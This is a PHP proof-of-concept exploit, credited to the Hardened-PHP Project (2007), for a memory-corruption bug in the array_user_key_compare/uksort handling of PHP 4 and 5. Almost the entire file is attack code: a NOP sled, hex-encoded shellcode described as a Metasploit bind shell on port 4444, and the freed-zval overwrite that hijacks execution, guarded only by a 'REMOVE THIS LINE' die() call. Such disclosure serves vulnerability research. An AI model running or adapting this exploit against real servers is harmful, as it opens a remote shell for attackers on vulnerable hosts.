?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ // // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ // // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| // // // // Proof of concept code from the Hardened-PHP Project // // (C) Copyright 2007 Stefan Esser // // // //////////////////////////////////////////////////////////////////////// // PHP 4/5 - array_user_key_compare() ZVAL dtor exploit // //////////////////////////////////////////////////////////////////////// // This is meant as a protection against remote file inclusion. die("REMOVE THIS LINE"); // You can put in any shellcode you want. Just make sure that the // shellcode string starts with enough NOP space // NOPSPACE $shellcode = str_repeat(chr(0x90), 710); // A bindshell on port 4444 generated by Metsploit $shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46". "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f". "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6". "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06". "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc". "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d". "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65"; $arr = array(str_repeat("A", 39) => 1, "B" => 1); function array_compare(&$key1, &$key2) { $GLOBALS['a'] = &$key2; unset($key2); return 1; } uksort($arr, "array_compare"); $x=array($shellcode => 1); $a[8*4+0] = $a[6*4+0]; $a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian $a[8*4+2] = $a[6*4+2]; $a[8*4+3] = $a[6*4+3]; unset($x); ?>